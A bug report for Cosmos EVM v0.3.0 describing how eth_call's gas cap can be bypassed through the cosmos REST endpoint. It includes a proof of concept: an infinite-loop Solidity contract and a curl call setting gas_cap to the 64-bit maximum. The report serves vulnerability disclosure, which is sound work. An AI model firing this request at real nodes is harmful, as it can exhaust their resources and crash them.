[Bug]: eth_call can be called with a very large gas limit and impact node performance #372
Description
Is there an existing issue for this?
- I have searched the existing issues
What happened?
Currently, an attacker can bypass the gas cap by querying directly at the cosmos level and specifying a very large gas cap
If done in a malicious way, an attacker could use a high GasCap to execute an infinite loop function, potentially impacting node performance & crashing the node
Cosmos EVM Version
v0.3.0
How to reproduce?
Step to reproduce
Deploy
// SPDX-License-Identifier: MIT
pragma solidity =0.8.6;
contract InfiniteLoop {
uint256 public count;
constructor() {
count = 0;
}
function infiniteLoop() public {
while (true) {
count++;
// This will cause an out-of-gas error if called
// in a transaction, but will not revert the contract.
// It will just keep incrementing `count`.
}
}
function getCount() public view returns (uint256) {
return count;
}
}
Call
curl http://localhost:1317/cosmos/evm/vm/v1/eth_call\?args\=eyJmcm9tIjogIjB4QzZGZTVEMzM2MTVhMUM1MmMwODAxOGM0N0U4QmM1MzY0NkEwRTEwMSIsICJ0byI6ICIweDNENjQxYTI3OTE1MzNCNEEwMDAwMzQ1ZUE4ZDUwOWQwMUUxZWMzMDEiLCJkYXRhIjogIjB4MWRiZjM1M2QifQ==\&gas_cap\=18446744073709551615
The base64 decoded value of args is {"from": "0xC6Fe5D33615a1C52c08018c47E8Bc53646A0E101", "to": "0x3D641a2791533B4A0000345eA8d509d01E1ec301","data": "0x1dbf353d"} where from is the address of user1 , to is the address of deployed contract and data is the signature of infiniteLoop() function.
Change the to address to the address of the deployed smart contract during testing if it changes in your setup.